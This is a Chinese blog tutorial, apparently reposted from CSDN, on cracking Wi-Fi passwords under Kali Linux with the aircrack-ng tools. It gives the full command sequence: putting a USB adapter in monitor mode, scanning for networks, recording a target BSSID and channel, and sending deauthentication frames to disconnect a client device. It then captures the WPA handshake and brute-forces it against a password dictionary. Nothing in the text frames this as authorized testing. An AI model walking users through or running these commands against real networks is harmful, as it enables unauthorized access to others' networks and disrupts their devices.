Linux_kali系统下的wifi破解

准备前提:必须要有USB无线网卡

把可移动设备(usb无线网卡)连入虚拟机,打开终端查看当前无线网卡

root@kali:~# airmon-ng

网卡名:wlan0mon

启用该网卡

root@kali:~# airmon-ng start wlan0mon


探测附近wifi

root@kali:~# airodump-ng wlan0mon


测试选用PWR绝对值小的,越小WiFi信号越强,按ctrl+z终止搜索。

记录下目标WiFi的BSSID和CH

监听路由器

root@kali:~# airodump-ng -w woshoubao -c X --bssid XX:XX:XX:XX:XX:XX wlan0mon --ignore-negative-one

-w后为握手包的名称(可自行定义),-c 后面为CH(信道),--bssid后面为上一步记录的bssid



显示出的是连接该WiFi设备的mac地址,任意选择一行设备作为攻击目标,这里我们以第一个为例子,记录它的STATION,新建终端,不要把这个终端关掉

截取握手包

root@kali:~# aireplay-ng --deaut 20 -a **:**:**:**:**:** -c **:**:**:**:**:** wlan0mon --ignore-negative-one
--deaut 后面的20代表攻击20次,-a后是路由器mac地址(即记录的bssid),-c是攻击设备mac地址(即前一步记录的STATION)。这是大量发送数据攻击该设备,导致它与WiFi断连,等待机器重连截获握手包

攻击后等待几秒会出现如下界面


这就是我们截获的握手包

在主目录下会发现一个woshoubao-01.cap文件,这就是截获的的握手包。

然后需要一个密码字典,成功与否在于密码是否包含在该字典中。

破解快慢取决于密码的复杂度和字典的大小

破解

aircrack-ng -w /tmp/123.txt woshoubao-01.cap

/tmp/123.txt是字典的路径,然后开始暴力破解这个握手包

密码简单的很快就能破解:


密码复杂的,不知道什么时候能够破解:



还不快回家改一下密码??

猜你喜欢

转载自blog.csdn.net/super_sloppy/article/details/78884610